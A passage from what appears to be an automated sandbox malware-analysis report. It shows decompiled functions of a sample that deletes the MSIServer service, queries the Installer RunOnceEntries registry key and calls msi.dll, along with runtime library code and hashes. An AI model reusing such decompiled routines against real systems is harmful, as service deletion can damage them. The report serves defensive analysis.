                        0x010611c6
                        0x010611ce
                        0x010611d3
                        0x010611d3

                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000001,00000000,0106273B), ref: 010611AC
                        • _fprintf.LIBCMT ref: 010611C6
                        • OpenServiceW.ADVAPI32(00000000,MSIServer,00010000,00000000), ref: 010611E0
                        • DeleteService.ADVAPI32(00000000), ref: 010611ED
                        • _fprintf.LIBCMT ref: 01061205
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 01061219
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 0106121C
                        Strings
                        • MSIServer, xrefs: 010611DA
                        • Failed to open MSI service, xrefs: 01061231
                        • ServicesActive, xrefs: 010611A4
                        • Failed to delete MSI service, xrefs: 010611F7
                        • Failed to open service control manager, xrefs: 010611B8
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Service$CloseHandleOpen_fprintf$DeleteManager
                        • String ID: Failed to delete MSI service$Failed to open MSI service$Failed to open service control manager$MSIServer$ServicesActive
                        • API String ID: 2904554157-4128441400
                        • Opcode ID: cbb565f9d4055a2b879283de66c7143a2d6cb3da280347170c7109bb4d7717c1
                        • Instruction ID: d70ab53e28578ea5fd8b691d87291236737b58028780e7657e3423b99680dcb0
                        • Opcode Fuzzy Hash: cbb565f9d4055a2b879283de66c7143a2d6cb3da280347170c7109bb4d7717c1
                        • Instruction Fuzzy Hash: B101D6B2F41202A7E732366AAC49BCE369CDFD4751F040035FA80EA201EA6ADD5446B9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0106BC7C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0106BC7C(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                        0x0106bc81
                        0x0106bc91

                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,010646B3,?,?,?,00000000), ref: 0106BC81
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0106BC8A
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: ca3533ff22a3badfb1a99dd3d29e054995d20f718fdaa79c7b784298cd025dcb
                        • Instruction ID: 5b29dc20bb8e6f3ccd52ee9d1caaa23b680cad113ce320c683d9925d0e44efdc
                        • Opcode Fuzzy Hash: ca3533ff22a3badfb1a99dd3d29e054995d20f718fdaa79c7b784298cd025dcb
                        • Instruction Fuzzy Hash: 84B09235448208ABCA103B91F80DB883F28EB14662F800020F64D544548B6754908B91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01072C02 Relevance: 1.5, APIs: 1, Instructions: 9COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • EnumSystemLocalesEx.KERNEL32(?,?,?,00000000), ref: 01072C10
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: EnumLocalesSystem
                        • String ID:
                        • API String ID: 2099609381-0
                        • Opcode ID: 0c49b049f4fe36321f3ae4dc9171df1f27624dd6e8058806997d6ec8f74b1a70
                        • Instruction ID: 61ebb1ed0d987a8b6253e44148c2e711ee3dc67f79e2a9e1f0797b3d10e963e2
                        • Opcode Fuzzy Hash: 0c49b049f4fe36321f3ae4dc9171df1f27624dd6e8058806997d6ec8f74b1a70
                        • Instruction Fuzzy Hash: FBC0483204020CFBDF121E91EC05B997F2AEB09660F808010FA28190618B73A520AB84
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01072C37 Relevance: 1.5, APIs: 1, Instructions: 9COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLocaleInfoEx.KERNEL32(?,?,00000002,?,?,0106D01C,?,?,?,00000002), ref: 01072C46
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: InfoLocale
                        • String ID:
                        • API String ID: 2299586839-0
                        • Opcode ID: 9ac52f6f22f220df398882974f006f13bfab79e4c40a19da614c938504906165
                        • Instruction ID: 16fc495fe23069bcdf440fca431e75ffced2219dfb49dd259daf94ad51d9124a
                        • Opcode Fuzzy Hash: 9ac52f6f22f220df398882974f006f13bfab79e4c40a19da614c938504906165
                        • Instruction Fuzzy Hash: 09C0483200020DFBCF025F81EC0489A7F2AFB09264B408010FA1814031CB339930EB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0106BC59 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0106BC59(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}



                        0x0106bc66

                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(?,?,0106AF7D,0106AF32), ref: 0106BC5F
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 373c31b094e4d8af456a6fc5d3852c2a11d33eaf0352e91783da6165b6d4f6d9
                        • Instruction ID: c07d24ede41ec17a2ab375b3d15559cc174fa46f1eba85678a23e05798f5d19f
                        • Opcode Fuzzy Hash: 373c31b094e4d8af456a6fc5d3852c2a11d33eaf0352e91783da6165b6d4f6d9
                        • Instruction Fuzzy Hash: 76A0223000020CFBCF003F82FC088883F3CEB002A0B800030F80C00020CB33A8A08BC0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 005E017B Relevance: .1, Instructions: 60COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                        • Instruction ID: 512371b359e38a9bca3066c08085a70db4848dc1dc05b42a61b8d4f24ccf3bc6
                        • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                        • Instruction Fuzzy Hash: 6A11C236600159AFC714EF6AC8849AEBBE9FF547A47048015FC95CB250E374EDC1CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 005E013E Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                        • Instruction ID: 5e2b863272e2f233f8fbdfda9b745f1e46d7742b8c4434c875800f6c842b0ca9
                        • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                        • Instruction Fuzzy Hash: C0E09236264189EFC708CBA9CC45D25B3F8FB09320B180290F815C73E0E674ED40D650
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 005E0109 Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                        • Instruction ID: 9f9d0518e9dc9a988aa600e06013396a54fcc41ddbf782e8620efd8405e52cbd
                        • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                        • Instruction Fuzzy Hash: 91E0DF332102949BC7299B0ACC00D96FBE8FB887B0B4A4421ED889B610C270FC40C790
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 005E005F Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                        • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                        • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                        • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01061320 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 93memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E01061320(int _a4) {
				short _v8;
				signed int _v12;
				char _v92;
				short _v612;
				signed int _t33;
				void* _t41;
				void* _t55;
				struct HINSTANCE__* _t57;

				_t57 = GetModuleHandleA("msi.dll");
				_v612 = 0;
				if(GetModuleFileNameW(_t57,  &_v612, 5) == 0) {
					GetLastError();
				}
				_v92 = 0;
				_v12 = 0xa;
				0x1060000( &_v612,  &_v92,  &_v12, 0, 0);
				_t33 = LoadStringW(_t57, 0xa,  &_v8, 0);
				_v12 = _t33;
				_v8 = HeapAlloc(GetProcessHeap(), 0, 2 + _t33 * 2);
				_t55 = HeapAlloc(GetProcessHeap(), 0, 0x52 + _v12 * 2);
				_t41 = _v8;
				if(_t41 != 0 && _t55 != 0) {
					 *_t41 = 0;
					LoadStringW(_t57, 0xa, _v8, _v12 + 1);
					swprintf(_t55, _v12 + 1, _v8,  &_v92);
					_t41 = _v8;
				}
				HeapFree(GetProcessHeap(), 0, _t41);
				HeapFree(GetProcessHeap(), 0, _t55);
				ExitProcess(_a4);
			}











                        0x01061337
                        0x0106133b
                        0x01061354
                        0x01061356
                        0x01061356
                        0x01061360
                        0x01061373
                        0x0106137a
                        0x01061388
                        0x01061394
                        0x010613ac
                        0x010613c1
                        0x010613c3
                        0x010613c8
                        0x010613d0
                        0x010613de
                        0x010613f1
                        0x010613f6
                        0x010613f9
                        0x0106140e
                        0x01061416
                        0x0106141b

                        APIs
                        • GetModuleHandleA.KERNEL32(msi.dll,?), ref: 01061331
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000005), ref: 0106134C
                        • GetLastError.KERNEL32 ref: 01061356
                        • LoadStringW.USER32(00000000,0000000A,00000001,00000000), ref: 01061388
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010613A1
                        • HeapAlloc.KERNEL32(00000000), ref: 010613AA
                        • GetProcessHeap.KERNEL32(00000000,0000000A), ref: 010613BC
                        • HeapAlloc.KERNEL32(00000000), ref: 010613BF
                        • LoadStringW.USER32(00000000,0000000A,00000001,0000000B), ref: 010613DE
                        • swprintf.LIBCMT ref: 010613F1
                        • GetProcessHeap.KERNEL32(00000000,00000001), ref: 01061405
                        • HeapFree.KERNEL32(00000000), ref: 0106140E
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061413
                        • HeapFree.KERNEL32(00000000), ref: 01061416
                        • ExitProcess.KERNEL32 ref: 0106141B
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFreeLoadModuleString$ErrorExitFileHandleLastNameswprintf
                        • String ID: msi.dll
                        • API String ID: 4014995864-3974507041
                        • Opcode ID: 0a33e521186df2e9f1d9d21cdeeda920f9874049c5a13d4cc69cea3ae593bb08
                        • Instruction ID: 381ae9cc35013970ce7a82e83cbd7f4576c94e092c77f6763ca0daef5b5f944e
                        • Opcode Fuzzy Hash: 0a33e521186df2e9f1d9d21cdeeda920f9874049c5a13d4cc69cea3ae593bb08
                        • Instruction Fuzzy Hash: CD31E571A00208BFEB21DBA4DD88FAEBBBCEF48700F000095B945E7154DA75AA459BA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01075AAD Relevance: 24.1, APIs: 16, Instructions: 92COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E01075AAD(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr* _t45;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t45 = E01064F0A(8, 1);
					_t52 = _t45;
					if(_t45 != 0) {
						_t12 = E01064F0A(0xb8, 1);
						 *_t45 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E01064F0A(0x220, 1);
							 *((intOrPtr*)(_t45 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E010755D5( *_t45, 0x1080d40);
								__eflags = E01075ECD(__ebx, __edx, 1, _t45,  *_t45, _a4, _a8);
								if(__eflags != 0) {
									_t17 = E0106DBBB(__edx, 1, __eflags,  *((intOrPtr*)( *_t45 + 4)),  *((intOrPtr*)(_t45 + 4)));
									__eflags = _t17;
									if(_t17 == 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)))) = 1;
										L17:
										return _t45;
									}
									E01064ED2( *((intOrPtr*)(_t45 + 4)));
									E0107024B( *_t45);
									E010700F1( *_t45);
									E01064ED2(_t45);
									L15:
									_t45 = 0;
									goto L17;
								}
								E0107024B( *_t45);
								E010700F1( *_t45);
								E01064ED2(_t45);
								goto L15;
							}
							E01064ED2( *_t45);
							E01064ED2(_t45);
							L8:
							goto L3;
						}
						E01064ED2(_t45);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E010647CC(_t52))) = 0xc;
					goto L4;
				}
			}










                        0x01075ab6
                        0x01075adc
                        0x00000000
                        0x01075abe
                        0x01075ac9
                        0x01075acd
                        0x01075acf
                        0x01075ae8
                        0x01075aef
                        0x01075af1
                        0x01075af3
                        0x01075b04
                        0x01075b0b
                        0x01075b0e
                        0x01075b10
                        0x01075b29
                        0x01075b3e
                        0x01075b40
                        0x01075b63
                        0x01075b6a
                        0x01075b6c
                        0x01075b94
                        0x01075b96
                        0x00000000
                        0x01075b96
                        0x01075b71
                        0x01075b78
                        0x01075b7f
                        0x01075b85
                        0x01075b8d
                        0x01075b8d
                        0x00000000
                        0x01075b8d
                        0x01075b44
                        0x01075b4b
                        0x01075b51
                        0x00000000
                        0x01075b56
                        0x01075b14
                        0x01075b1a
                        0x01075afb
                        0x00000000
                        0x01075afb
                        0x01075af6
                        0x00000000
                        0x01075af6
                        0x01075ad1
                        0x01075ad6
                        0x00000000
                        0x01075ad6

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                        • String ID:
                        • API String ID: 2661855409-0
                        • Opcode ID: 104286de649f2d6f4931ad2800fec91f0cc7e5de3a14241637f554391639b97d
                        • Instruction ID: 9a1e47e32daa1478910b15b90e522ab9266e2bb8740fe6c329125001ad127caf
                        • Opcode Fuzzy Hash: 104286de649f2d6f4931ad2800fec91f0cc7e5de3a14241637f554391639b97d
                        • Instruction Fuzzy Hash: 6721B635D08703FEEB223F69DC45DDE7BE8EF61760B208429F5C895564EF6298208A5C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01061B50 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 99registrymemorystringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E01061B50(short* _a4, intOrPtr _a8, WCHAR*** _a12) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr _v20;
				void* _t29;
				intOrPtr _t43;
				intOrPtr _t54;
				void* _t57;
				void* _t60;

				_v12 = 0;
				_v16 = 0;
				_t57 = 0;
				if(RegOpenKeyW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\RunOnceEntries",  &_v8) == 0) {
					_t29 = RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12);
					__eflags = _t29;
					if(_t29 != 0) {
						L9:
						RegCloseKey(_v8);
						return _t57;
					} else {
						__eflags = _v16 - 1;
						if(_v16 != 1) {
							goto L9;
						} else {
							_t54 = lstrlenW( *( *_a12)) + _t34;
							_v20 = _t54;
							_t60 = HeapAlloc(GetProcessHeap(), 0, _v12 + 2 + _t54);
							__eflags = _t60;
							if(_t60 != 0) {
								E01063C60(_t60,  *( *_a12), _v20);
								_t43 = _v20;
								 *((short*)(_t43 + _t60)) = 0x20;
								__eflags = RegQueryValueExW(_v8, _a4, 0,  &_v16, _t43 + 2 + _t60,  &_v12);
								if(__eflags == 0) {
									E01061A90(__eflags, _t60, _a8, _a12);
									_t57 = 1;
								}
								HeapFree(GetProcessHeap(), 0, _t60);
								goto L9;
							} else {
								RegCloseKey(_v8);
								__eflags = 0;
								return 0;
							}
						}
					}
				} else {
					return 0;
				}
			}












                        0x01061b65
                        0x01061b6c
                        0x01061b73
                        0x01061b7d
                        0x01061b9b
                        0x01061ba1
                        0x01061ba3
                        0x01061c57
                        0x01061c5a
                        0x01061c67
                        0x01061ba9
                        0x01061ba9
                        0x01061bad
                        0x00000000
                        0x01061bb3
                        0x01061bc0
                        0x01061bce
                        0x01061bde
                        0x01061be0
                        0x01061be2
                        0x01061c02
                        0x01061c07
                        0x01061c12
                        0x01061c32
                        0x01061c34
                        0x01061c3d
                        0x01061c42
                        0x01061c42
                        0x01061c51
                        0x00000000
                        0x01061be4
                        0x01061be7
                        0x01061bee
                        0x01061bf4
                        0x01061bf4
                        0x01061be2
                        0x01061bad
                        0x01061b7f
                        0x01061b85
                        0x01061b85

                        APIs
                        • RegOpenKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries,?), ref: 01061B75
                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 01061B9B
                        • lstrlenW.KERNEL32(?), ref: 01061BBA
                        • GetProcessHeap.KERNEL32(00000000,-00000002), ref: 01061BD1
                        • HeapAlloc.KERNEL32(00000000), ref: 01061BD8
                        • RegCloseKey.ADVAPI32(?), ref: 01061BE7
                        Strings
                        • Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries, xrefs: 01061B5B
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$AllocCloseOpenProcessQueryValuelstrlen
                        • String ID: Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries
                        • API String ID: 4113790418-2918440441
                        • Opcode ID: 9836e66c81c8235568c5ef19add951eb253312c11497c1e3410490ad8de1c549
                        • Instruction ID: a077f6b21ba31d1dcf03752a00769700df647098c60a341b5ea5ef9f043b4280
                        • Opcode Fuzzy Hash: 9836e66c81c8235568c5ef19add951eb253312c11497c1e3410490ad8de1c549
                        • Instruction Fuzzy Hash: FC313C72A0020CEFDB229FA8DC49FAEBBB9FF45310F004095F951E6150DB369A20DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01065168 Relevance: 19.6, APIs: 13, Instructions: 81COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E01065168(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				LONG* _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;

				_t14 = __ebx;
				__imp__DecodePointer( *0x1081d68);
				_t25 =  *0x1081028; // 0xba2948
				_t24 = __eax;
				if(_t25 != 0) {
					while( *_t25 != 0) {
						E01064ED2( *_t25);
						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0x1081028; // 0xba2948
				}
				_push(_t14);
				E01064ED2(_t25);
				_t26 =  *0x1081024; // 0x0
				 *0x1081028 = 0;
				if(_t26 != 0) {
					while( *_t26 != 0) {
						E01064ED2( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x1081024; // 0x0
				}
				E01064ED2(_t26);
				 *0x1081024 = 0;
				E01064ED2( *0x1081020);
				_t5 = E01064ED2( *0x108101c);
				 *0x1081020 = 0;
				 *0x108101c = 0;
				if(_t24 != 0xffffffff) {
					_t5 = E01064ED2(_t24);
				}
				__imp__EncodePointer(0);
				 *0x1081d68 = _t5;
				_t6 =  *0x1081048; // 0x0
				if(_t6 != 0) {
					E01064ED2(_t6);
					 *0x1081048 = 0;
				}
				_t7 =  *0x108104c; // 0x0
				if(_t7 != 0) {
					E01064ED2(_t7);
					 *0x108104c = 0;
				}
				_t8 = InterlockedDecrement( *0x10806ac);
				if(_t8 == 0) {
					_t8 =  *0x10806ac; // 0xba2248
					if(_t8 != 0x10809a8) {
						_t9 = E01064ED2(_t8);
						 *0x10806ac = 0x10809a8;
						return _t9;
					}
				}
				return _t8;
			}












                        0x01065168
                        0x01065170
                        0x01065176
                        0x0106517c
                        0x01065180
                        0x01065182
                        0x01065189
                        0x0106518f
                        0x01065192
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01065192
                        0x01065194
                        0x01065194
                        0x0106519a
                        0x0106519c
                        0x010651a1
                        0x010651aa
                        0x010651b2
                        0x010651b4
                        0x010651ba
                        0x010651c0
                        0x010651c3
                        0x00000000
                        0x00000000
                        0x00000000
                        0x010651c3
                        0x010651c5
                        0x010651c5
                        0x010651cc
                        0x010651d7
                        0x010651dd
                        0x010651e8
                        0x010651f0
                        0x010651f6
                        0x010651ff
                        0x01065202
                        0x01065207
                        0x01065209
                        0x0106520f
                        0x01065214
                        0x0106521b
                        0x0106521e
                        0x01065224
                        0x01065224
                        0x0106522a
                        0x01065231
                        0x01065234
                        0x0106523a
                        0x0106523a
                        0x01065246
                        0x0106524f
                        0x01065251
                        0x0106525d
                        0x01065260
                        0x01065266
                        0x00000000
                        0x01065266
                        0x0106525d
                        0x0106526e

                        APIs
                        • DecodePointer.KERNEL32 ref: 01065170
                        • _free.LIBCMT ref: 01065189
                          • Part of subcall function 01064ED2: HeapFree.KERNEL32(00000000,00000000,?,0106B325,00000000,01062F8B,0107DF38,0000000C,01062084,-00000040,Unknown option "%c" in Repair mode), ref: 01064EE6
                          • Part of subcall function 01064ED2: GetLastError.KERNEL32(00000000,?,0106B325,00000000,01062F8B,0107DF38,0000000C,01062084,-00000040,Unknown option "%c" in Repair mode), ref: 01064EF8
                        • _free.LIBCMT ref: 0106519C
                        • _free.LIBCMT ref: 010651BA
                        • _free.LIBCMT ref: 010651CC
                        • _free.LIBCMT ref: 010651DD
                        • _free.LIBCMT ref: 010651E8
                        • _free.LIBCMT ref: 01065202
                        • EncodePointer.KERNEL32(00000000), ref: 01065209
                        • _free.LIBCMT ref: 0106521E
                        • _free.LIBCMT ref: 01065234
                        • InterlockedDecrement.KERNEL32 ref: 01065246
                        • _free.LIBCMT ref: 01065260
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                        • String ID:
                        • API String ID: 4264854383-0
                        • Opcode ID: 9a57716c163faac7c5c97df9cef4320d0680e7122a111deceeb5fe89bfb6dfae
                        • Instruction ID: 86a43876cb99d79e0f667269f0d71909e1f07fb5aa7627368c323dc7b2f63edb
